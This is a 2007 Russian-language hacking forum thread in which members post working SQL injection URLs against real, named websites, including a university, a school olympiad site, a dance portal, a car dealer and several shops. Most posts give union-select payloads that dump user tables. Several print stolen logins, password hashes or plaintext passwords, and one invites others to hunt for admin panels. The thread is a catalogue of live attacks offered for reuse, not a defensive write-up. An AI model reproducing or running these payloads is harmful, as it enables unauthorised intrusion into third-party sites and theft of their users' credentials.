HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql-inj
  #1881  
Старый 13.04.2007, 23:47
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами: 10041506

Репутация: 572
Arrow sql-inj

Новосибирский Гос Тех Университет
Сайт: http://inform.nstu.ru/
уязвимость: http://inform.nstu.ru/index.php?type=ubilei&stat=1'
подобранные таблицы: users
подобранные поля: login,password
7 организмов
Цитата:
http://inform.nstu.ru/index.php?type=ubilei&stat=-1%20union%20select%201,2,concat(login,char(58),pas sword),4,5,6,7,8,9,0,1,2,3%20from%20users%20limit% 200,1/*
нулевой организм: ZiF:0b2fdf29656163be070897c655defc12 rockme
 
Ответить с цитированием

sql-not_finished
  #1882  
Старый 14.04.2007, 00:19
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами: 10041506

Репутация: 572
Arrow sql-not_finished

Незавершенное:

Сайт: http://www.step-into-the-future.ru/ (олимпиада "Шаг в будущее")
Информация: (stepin@aqua2.di-net.ru:4.0.26)
Цитата:
http://www.step-into-the-future.ru/frb_light/view_all_topic.php?&mid=-1&t=&text_po isk=&m_id=-534+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion()),6,7,8/*
Сайт: http://www.idance.ru/ (Портал современных танцев iDance)
Информация: (idancer_idancedb@localhost:4.1.22)
Цитата:
http://www.idance.ru/show.php?id_s=-15+union+select+concat_ws(0x3a,user(),version()),2/*
Сайт: http://www.kif-daks.ru/ (Оптовая торговля книгами. КИФ-Дакс)
Информация: (mataru@localhost:4.1.20-lk-log)
Цитата:
http://www.kif-daks.ru/newprew.php?id=-336+union+select+1,concat_ws(0x3a,user(),version() ),3,4,5,6,7,8/*
Кто продвинется, пишем.

Последний раз редактировалось Koller; 14.04.2007 в 04:41..
 
Ответить с цитированием

  #1883  
Старый 14.04.2007, 04:31
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами: 10374086

Репутация: 1745


По умолчанию

Код:
http://opel.avto-city.ru/catalog.php?id=-3+union+select+login,2,pass,4,5,6,7+from+admin/*
opel:reklama
Автоцентр Сити - официальный дилер Opel (Опель)
 
Ответить с цитированием

  #1884  
Старый 14.04.2007, 08:20
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

Код:
http://www.seredina.ru/index.php?id=1&city_id=-12+union+select+concat(login,char(58),pwd)+from+admins/*
хороша дружно ищем админку
 
Ответить с цитированием

  #1885  
Старый 14.04.2007, 08:55
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами: 10088966

Репутация: 646


По умолчанию

Цитата:
http://comedy.perm.ru/main/index.html?pg=7&nid=-1+union+select+1,2,3,version(),5,6,7/*
Мышка, ****, норушка (с) Галыгин.

P.S. Ничего интересного по части таблиц так и не нашел...
 
Ответить с цитированием

sql-inj
  #1886  
Старый 14.04.2007, 09:51
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами: 10041506

Репутация: 572
Arrow sql-inj

Сайт: http://www.audiobookz.ru/
уязвимость: http://www.audiobookz.ru/show_r.php?r=1'
подобранные таблицы: users
подобранные поля: login,pas,uid,name
Цитата:
http://www.audiobookz.ru/show_r.php?r=1+union+select+concat_ws(0x3a,uid,nam e,login,pas)+from+users/*
есть админка http://www.audiobookz.ru/admin/ , но не пашет.
 
Ответить с цитированием

  #1887  
Старый 14.04.2007, 10:09
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


Cool

www.equipnet.ru
Код:
http://www.equipnet.ru/show_firm.php?firm_id=-23638+union+select+concat(convert(version()+using+cp1251),char(59),database(),char(59),user())/*

Последний раз редактировалось Isis; 14.04.2007 в 10:31..
 
Ответить с цитированием

cont
  #1888  
Старый 14.04.2007, 10:19
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами: 10041506

Репутация: 572
По умолчанию cont

comedy
Цитата:
Сообщение от Joker-jar  
Мышка, ****, норушка (с) Галыгин.

P.S. Ничего интересного по части таблиц так и не нашел...
Нашел таблицы news, ibf_members, ibf_admin_sessions и т.д. но походу ibf_* не от того форума, который действует на сайте.

Цитата:
http://comedy.perm.ru/main/index.html?pg=7&nid=-1+union+select+1,2,3,concat_ws(0x3a,id,name,passwo rd,email,ip_address),5,6,7+from+ibf_members+limit+ 1,1/*

Последний раз редактировалось Серенький; 14.04.2007 в 10:21..
 
Ответить с цитированием

  #1889  
Старый 14.04.2007, 10:32
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


Cool

www.photodom.com
Код:
http://www.photodom.com/mypage.php?nick=Font'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,user(),database(),22,23,24,25,26,27,28,29/*
www.coffeeblues.ru
Код:
http://www.coffeeblues.ru/news/index.php3?id=-31+union+select+1,2,concat(database(),char(58,58),user(),char(58,58),version()),4,5,6,7,8,9,10,11,12/*
www.super.com.ua
Код:
http://www.super.com.ua/local/plug-in/a-price/showone.php?groupid=65&id=-21096+union+select+1,2,3,4,5,6,7,8,9,concat(database(),char(58,58),user(),char(58,58),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

Последний раз редактировалось Isis; 14.04.2007 в 10:56..
 
Ответить с цитированием

  #1890  
Старый 14.04.2007, 13:00
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

apelsinclub.ru
Код:
http://www.apelsinclub.ru/show.php?event=-1+union+select+1,2,3,concat(nick,0x3a,pwd),5,6,7+from+users/*
pwd=email в форме логина.
пароли в чистом виде
admin:uuu
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...